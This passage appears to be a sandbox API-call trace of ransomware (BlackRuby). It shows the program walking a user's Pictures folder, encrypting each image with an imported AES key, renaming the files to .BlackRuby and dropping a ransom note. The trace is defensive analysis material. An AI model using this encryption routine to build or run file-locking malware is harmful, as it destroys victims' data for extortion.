lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", lpFilePart=0x0) returned 0x2a [0061.075] GetLastError () returned 0x5 [0061.075] SetErrorMode (uMode=0x1) returned 0x0 [0061.075] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0061.075] GetLastError () returned 0x5 [0061.075] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.075] GetLastError () returned 0x5 [0061.075] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.075] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x5 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.076] GetLastError () returned 0x12 [0061.076] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0061.076] SetErrorMode (uMode=0x0) returned 0x1 [0061.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ", lpFilePart=0x0) returned 0x2a [0061.076] GetLastError () returned 0x12 [0061.076] SetErrorMode (uMode=0x1) returned 0x0 [0061.076] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.076] GetLastError () returned 0x12 [0061.076] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.077] GetLastError () returned 0x12 [0061.077] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0061.077] SetErrorMode (uMode=0x0) returned 0x1 [0061.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.077] GetLastError () returned 0x12 [0061.077] SetErrorMode (uMode=0x1) returned 0x0 [0061.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1c20a14 | out: lpFileInformation=0x1c20a14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62caa1a0, ftCreationTime.dwHighDateTime=0x1d357aa, ftLastAccessTime.dwLowDateTime=0x38796e70, ftLastAccessTime.dwHighDateTime=0x1d357ac, ftLastWriteTime.dwLowDateTime=0x38796e70, ftLastWriteTime.dwHighDateTime=0x1d357ac, nFileSizeHigh=0x0, nFileSizeLow=0xf9c7)) returned 1 [0061.077] GetLastError () returned 0x12 [0061.077] SetErrorMode (uMode=0x0) returned 0x1 [0061.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.077] GetLastError () returned 0x12 [0061.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.077] GetLastError () returned 0x12 [0061.077] SetErrorMode (uMode=0x1) returned 0x0 [0061.078] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.078] GetLastError () returned 0x0 [0061.078] GetFileType (hFile=0x258) returned 0x1 [0061.078] SetErrorMode (uMode=0x0) returned 0x1 [0061.078] GetFileType (hFile=0x258) returned 0x1 [0061.078] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xf9c7 [0061.078] GetLastError () returned 0x0 [0061.078] ReadFile (in: hFile=0x258, lpBuffer=0x1c2293c, nNumberOfBytesToRead=0xf9c7, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c2293c*, lpNumberOfBytesRead=0x18ed18*=0xf9c7, lpOverlapped=0x0) returned 1 [0061.079] GetLastError () returned 0x0 [0061.079] CloseHandle (hObject=0x258) returned 1 [0061.079] GetLastError () returned 0x0 [0061.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.079] GetLastError () returned 0x0 [0061.079] SetErrorMode (uMode=0x1) returned 0x0 [0061.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62caa1a0, ftCreationTime.dwHighDateTime=0x1d357aa, ftLastAccessTime.dwLowDateTime=0x38796e70, ftLastAccessTime.dwHighDateTime=0x1d357ac, ftLastWriteTime.dwLowDateTime=0x38796e70, ftLastWriteTime.dwHighDateTime=0x1d357ac, nFileSizeHigh=0x0, nFileSizeLow=0xf9c7)) returned 1 [0061.079] GetLastError () returned 0x0 [0061.079] SetErrorMode (uMode=0x0) returned 0x1 [0061.079] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0061.079] GetLastError () returned 0x0 [0061.114] CryptImportKey (in: hProv=0x37c818, pbData=0x1c9c0c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360fa0) returned 1 [0061.114] GetLastError () returned 0x0 [0061.114] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.114] GetLastError () returned 0x0 [0061.119] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.119] GetLastError () returned 0x0 [0061.119] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0061.119] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.119] GetLastError () returned 0x0 [0061.119] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1cc910c*=0x1, dwFlags=0x0) returned 1 [0061.119] GetLastError () returned 0x0 [0061.119] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1cc90d8, dwFlags=0x0) returned 1 [0061.119] GetLastError () returned 0x0 [0061.119] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc9154*, pdwDataLen=0x18ed08*=0xfac0, dwBufLen=0xfac0 | out: pbData=0x1cc9154*, pdwDataLen=0x18ed08*=0xfac0) returned 1 [0061.120] GetLastError () returned 0x0 [0061.120] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce8700*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1ce8700*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.120] GetLastError () returned 0x0 [0061.120] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce8730*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1ce8730*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.120] GetLastError () returned 0x0 [0061.120] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.120] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.120] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.120] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.120] GetLastError () returned 0x0 [0061.120] SetErrorMode (uMode=0x1) returned 0x0 [0061.121] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.122] GetLastError () returned 0xb7 [0061.122] GetFileType (hFile=0x258) returned 0x1 [0061.122] SetErrorMode (uMode=0x0) returned 0x1 [0061.122] GetFileType (hFile=0x258) returned 0x1 [0061.123] CloseHandle (hObject=0x258) returned 1 [0061.123] GetLastError () returned 0xb7 [0061.123] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg", lpFilePart=0x0) returned 0x42 [0061.123] GetLastError () returned 0xb7 [0061.123] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_Za7u8atRPDSCvADcNN1YySFKx1miQxnTzDJVdz0Tc0uX.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_Za7u8atRPDSCvADcNN1YySFKx1miQxnTzDJVdz0Tc0uX.BlackRuby", lpFilePart=0x0) returned 0x6b [0061.123] GetLastError () returned 0xb7 [0061.123] SetErrorMode (uMode=0x1) returned 0x0 [0061.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62caa1a0, ftCreationTime.dwHighDateTime=0x1d357aa, ftLastAccessTime.dwLowDateTime=0x38796e70, ftLastAccessTime.dwHighDateTime=0x1d357ac, ftLastWriteTime.dwLowDateTime=0x2c9f1b40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xfad0)) returned 1 [0061.124] GetLastError () returned 0xb7 [0061.124] SetErrorMode (uMode=0x0) returned 0x1 [0061.124] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\3aVnti5L3DifBb2HU2S.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\3avnti5l3difbb2hu2s.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_Za7u8atRPDSCvADcNN1YySFKx1miQxnTzDJVdz0Tc0uX.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_za7u8atrpdscvadcnn1yysfkx1miqxntzdjvdz0tc0ux.blackruby")) returned 1 [0061.124] GetLastError () returned 0xb7 [0061.125] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.125] GetLastError () returned 0xb7 [0061.125] SetErrorMode (uMode=0x1) returned 0x0 [0061.125] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.125] GetLastError () returned 0x0 [0061.125] GetFileType (hFile=0x258) returned 0x1 [0061.125] SetErrorMode (uMode=0x0) returned 0x1 [0061.125] GetFileType (hFile=0x258) returned 0x1 [0061.126] CloseHandle (hObject=0x258) returned 1 [0061.126] GetLastError () returned 0x0 [0061.126] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.126] GetLastError () returned 0x0 [0061.127] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.127] GetLastError () returned 0x0 [0061.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.127] GetLastError () returned 0x0 [0061.127] SetErrorMode (uMode=0x1) returned 0x0 [0061.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1d15104 | out: lpFileInformation=0x1d15104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe92b0, ftCreationTime.dwHighDateTime=0x1d352cc, ftLastAccessTime.dwLowDateTime=0x781a15b0, ftLastAccessTime.dwHighDateTime=0x1d351cc, ftLastWriteTime.dwLowDateTime=0x781a15b0, ftLastWriteTime.dwHighDateTime=0x1d351cc, nFileSizeHigh=0x0, nFileSizeLow=0xf705)) returned 1 [0061.127] GetLastError () returned 0x0 [0061.127] SetErrorMode (uMode=0x0) returned 0x1 [0061.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.127] GetLastError () returned 0x0 [0061.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.127] GetLastError () returned 0x0 [0061.127] SetErrorMode (uMode=0x1) returned 0x0 [0061.127] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.128] GetLastError () returned 0x0 [0061.128] GetFileType (hFile=0x258) returned 0x1 [0061.128] SetErrorMode (uMode=0x0) returned 0x1 [0061.128] GetFileType (hFile=0x258) returned 0x1 [0061.128] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xf705 [0061.128] GetLastError () returned 0x0 [0061.128] ReadFile (in: hFile=0x258, lpBuffer=0x1d16dac, nNumberOfBytesToRead=0xf705, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d16dac*, lpNumberOfBytesRead=0x18ed18*=0xf705, lpOverlapped=0x0) returned 1 [0061.129] GetLastError () returned 0x0 [0061.129] CloseHandle (hObject=0x258) returned 1 [0061.129] GetLastError () returned 0x0 [0061.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.131] GetLastError () returned 0x0 [0061.131] SetErrorMode (uMode=0x1) returned 0x0 [0061.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe92b0, ftCreationTime.dwHighDateTime=0x1d352cc, ftLastAccessTime.dwLowDateTime=0x781a15b0, ftLastAccessTime.dwHighDateTime=0x1d351cc, ftLastWriteTime.dwLowDateTime=0x781a15b0, ftLastWriteTime.dwHighDateTime=0x1d351cc, nFileSizeHigh=0x0, nFileSizeLow=0xf705)) returned 1 [0061.131] GetLastError () returned 0x0 [0061.131] SetErrorMode (uMode=0x0) returned 0x1 [0061.131] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0061.132] GetLastError () returned 0x0 [0061.167] CryptImportKey (in: hProv=0x37c818, pbData=0x1b9fd28, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0061.167] GetLastError () returned 0x0 [0061.167] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.167] GetLastError () returned 0x0 [0061.172] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.172] GetLastError () returned 0x0 [0061.172] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ee0) returned 1 [0061.172] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.172] GetLastError () returned 0x0 [0061.172] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1bccd74*=0x1, dwFlags=0x0) returned 1 [0061.172] GetLastError () returned 0x0 [0061.172] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1bccd40, dwFlags=0x0) returned 1 [0061.172] GetLastError () returned 0x0 [0061.172] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bccdbc*, pdwDataLen=0x18ed08*=0xf800, dwBufLen=0xf800 | out: pbData=0x1bccdbc*, pdwDataLen=0x18ed08*=0xf800) returned 1 [0061.173] GetLastError () returned 0x0 [0061.173] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bebde8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bebde8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.173] GetLastError () returned 0x0 [0061.173] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bebe18*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bebe18*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.173] GetLastError () returned 0x0 [0061.173] CryptDestroyKey (hKey=0x360f20) returned 1 [0061.173] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.173] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.173] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.173] GetLastError () returned 0x0 [0061.173] SetErrorMode (uMode=0x1) returned 0x0 [0061.173] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.175] GetLastError () returned 0xb7 [0061.175] GetFileType (hFile=0x258) returned 0x1 [0061.175] SetErrorMode (uMode=0x0) returned 0x1 [0061.175] GetFileType (hFile=0x258) returned 0x1 [0061.176] CloseHandle (hObject=0x258) returned 1 [0061.176] GetLastError () returned 0xb7 [0061.176] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp", lpFilePart=0x0) returned 0x41 [0061.176] GetLastError () returned 0xb7 [0061.176] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_MQ98CdTGkq0VN5YNVeCnVOfwBPuhHJANAdMRf3p.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_MQ98CdTGkq0VN5YNVeCnVOfwBPuhHJANAdMRf3p.BlackRuby", lpFilePart=0x0) returned 0x66 [0061.176] GetLastError () returned 0xb7 [0061.176] SetErrorMode (uMode=0x1) returned 0x0 [0061.176] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe92b0, ftCreationTime.dwHighDateTime=0x1d352cc, ftLastAccessTime.dwLowDateTime=0x781a15b0, ftLastAccessTime.dwHighDateTime=0x1d351cc, ftLastWriteTime.dwLowDateTime=0x2ca8a0c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf810)) returned 1 [0061.176] GetLastError () returned 0xb7 [0061.176] SetErrorMode (uMode=0x0) returned 0x1 [0061.176] MoveFileW 